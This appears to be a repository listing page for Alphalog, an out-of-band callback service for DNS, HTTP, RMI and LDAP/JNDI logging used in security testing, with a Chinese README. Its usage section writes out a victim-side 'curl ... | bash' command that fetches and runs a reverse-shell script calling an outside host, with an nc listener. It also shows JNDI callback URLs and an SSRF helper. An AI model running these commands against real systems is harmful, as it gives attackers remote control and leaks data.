• Stars
    star
    413
  • Rank 104,801 (Top 3 %)
  • Language
    Go
  • License
    GNU Affero Genera...
  • Created almost 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

DNSLOG、httplog、rmilog、ldaplog、jndi 等都支持,完全匿名 产品(fuzz.red),Alphalog与传统DNSLog不同,更快、更安全。

Alphalog

DNSLog、httplog、rmilog、ldaplog、jndi 等都支持,完全匿名 ,Alphalog与传统DNSLog不同,更快、更安全。

patch 内容

update了前端展示,增加了DNS外带功能。支持极端条件下命令执行结果通过dns外带 >>> demo

image

image

  $$$$$$\  $$\           $$\                 $$\                          
 $$  __$$\ $$ |          $$ |                $$ |                         
 $$ /  $$ |$$ | $$$$$$\  $$$$$$$\   $$$$$$\  $$ |      $$$$$$\   $$$$$$\  
 $$$$$$$$ |$$ |$$  __$$\ $$  __$$\  \____$$\ $$ |     $$  __$$\ $$  __$$\ 
 $$  __$$ |$$ |$$ /  $$ |$$ |  $$ | $$$$$$$ |$$ |     $$ /  $$ |$$ /  $$ |
 $$ |  $$ |$$ |$$ |  $$ |$$ |  $$ |$$  __$$ |$$ |     $$ |  $$ |$$ |  $$ |
 $$ |  $$ |$$ |$$$$$$$  |$$ |  $$ |\$$$$$$$ |$$$$$$$$\\$$$$$$  |\$$$$$$$ |
 \__|  \__|\__|$$  ____/ \__|  \__| \_______|\________|\______/  \____$$ |
               $$ |                                             $$\   $$ |
               $$ |                 By:Alphabug                 \$$$$$$  |
               \__|                 Version:0.2022.01.16.01      \______/

Welcome to alphalog

image

Install

  1. 系统环境
  • 任意平台
  • Redis数据库
  1. 创建config.yaml文件 内容如下
domain: alphabug.cn
IP_DNS: VPS地址
IP_JNDI: VPS地址
database: redis:Redis数据库地址:端口:密码
PORT_HTTP: HTTPLOG端口
PORT_JNDI: RMI/LDAP端口

例如

domain: alphabug.cn
IP_DNS: 192.168.1.7
IP_JNDI: 192.168.1.7
database: redis:192.168.1.3:6379:Alphabug
PORT_HTTP: 80
PORT_JNDI: 5
  1. Run
E:\Code\GolandProjects\Alphalog\output> Alphalog_windows_amd64.exe

  $$$$$$\  $$\           $$\                 $$\
 $$  __$$\ $$ |          $$ |                $$ |
 $$ /  $$ |$$ | $$$$$$\  $$$$$$$\   $$$$$$\  $$ |      $$$$$$\   $$$$$$\
 $$$$$$$$ |$$ |$$  __$$\ $$  __$$\  \____$$\ $$ |     $$  __$$\ $$  __$$\
 $$  __$$ |$$ |$$ /  $$ |$$ |  $$ | $$$$$$$ |$$ |     $$ /  $$ |$$ /  $$ |
 $$ |  $$ |$$ |$$ |  $$ |$$ |  $$ |$$  __$$ |$$ |     $$ |  $$ |$$ |  $$ |
 $$ |  $$ |$$ |$$$$$$$  |$$ |  $$ |\$$$$$$$ |$$$$$$$$\\$$$$$$  |\$$$$$$$ |
 \__|  \__|\__|$$  ____/ \__|  \__| \_______|\________|\______/  \____$$ |
               $$ |                                             $$\   $$ |
               $$ |                 By:Alphabug                 \$$$$$$  |
               \__|                 Version:1.0.0.Releases       \______/
2022/04/30 20:40:09 [Config] Redis Initialization succeeded
2022/04/30 20:40:09 [DNS] Domain: alphabug.cn
2022/04/30 20:40:09 [Redis] Start redis database init
2022/04/30 20:40:09 [DNS] Initialization succeeded
2022/04/30 20:40:09 [JNDI] Start fake reverse server

Usage

  1. Get token(key) and randomly named subdomain (Expires: 1 Day)

    $ curl fuzz.red/get
    {"key":"63d755be-9683-40a9-91fb-b85890155872","subdomain":"oz4e.fuzz.red"}
  2. Get logs

    $ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872"
    {"code":200,"data":[]}

DNSLOG

ping -c 1 oz4e.fuzz.red
$ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872"
{"code":200,"data":["{\"ip\":\"192.168.1.1\",\"reqbody\":[\"\"],\"subdomain\":\"oz4e.fuzz.red.\",\"time\":\"2022-01-14 17:01:17 +0800 CST\",\"type\":\"dns\"}"]} 

HTTPLOG

curl oz4e.fuzz.red -d "abc"
$ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872" | python -m json.tool
{
"code": 200,
"data": [
	{...}]
}

SSRF

$ curl -L fuzz.red/ssrf/www.baidu.com/
<!DOCTYPE html>...(www.baidu.com page)...</html>

反弹shell

$ curl fuzz.red/sh4ll/ip:port

Victim

$ curl fuzz.red/sh4ll/1.2.3.4:1234 | bash
# or 
$ curl fuzz.red/sh4ll/1.2.3.4:1234 | sh

VPS

$ nc -lvvp 1234
listening on [any] 1234 ...
connect to [1.2.3.4] from fbi.gov [127.0.0.1] 46958

RMI or LDAP

PATH规则为“sub/text”,sub为子域名的主机头,text为自定义特征 例如:子域名=oz4e.fuzz.red,text=Alphabug => oz4e/Alphabug

rmi://jndi.fuzz.red:5/oz4e/Alphabug
# or
ldap://jndi.fuzz.red:5/oz4e/Alphabug

获取log

$ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872" | python -m json.tool

{
	"code": 200,
	"data": [
		{
			"ip": "1.2.3.4:41584",
			"reqbody": "Alphabug",
			"subdomain": "oz4e.fuzz.red.",
			"time": "2022-01-16 03:40:03 -0500 EST",
			"type": "ldap"
		}
	]
}

作者有话说

项目名称为:Alphalog,作者Alphabug。

采用Go编写开发 DNS服务、Http服务等,后续等待开源。

项目域名为匿名域名,请求接口没有做任何的记录。所有dnslog存活时间为1天,大家可以亲测。

(请勿CC/DDos,服务器特别贵,可能没办法退钱)

项目日志:

  • 2021年12月14日 17:30:35 第一个版本完成
  • 2021年12月14日 20:14:57 特别感谢团队成员hexman、Longlone(WaY)测试提出的各类bug。
  • 2021年12月14日 20:26:33 上架公测,我是Alphabug欢迎大家提需求,目的就是让dnslog扩展性更高,如果您有建议请邮箱联系我:[email protected]
  • 2021年12月14日 21:17:15 页面不再更新,Issue 上github吧。项目地址 https://github.com/AlphabugX/Alphalog
  • 2022年01月15日 17:07:41 添加httplog功能,升级数据格式。
  • 2022年01月15日 17:52:03 添加SSRF辅助功能。
  • 2022年01月15日 18:52:42 添加反弹shell功能,支持bash、sh、nc、python、awk、telnet弹shell方法。
  • 2022年01月16日 16:45:12 添加RMI、LDAP log功能,引用https://github.com/EmYiQing/JNDIScan核心模块,实现log查询。
  • 2022年4月30日 20:26:29 正式开源,进行公测,任何问题,请及时反馈到Issues,在此感谢所有支持Alphalog项目的朋友,由衷的感谢,另外新增短链接功能,优化API。(相关API文档后续公布,欢迎提稿)

curl 效果日志

image

www.fuzz.red 效果

www fuzz red_(iPhone X)

image

Stargazers over time

Stargazers over time

实时反馈群

QQ反馈群

QQ群:727871590

$XVJBS5Q 5QNTDURQ(AKGU6

2022.04.11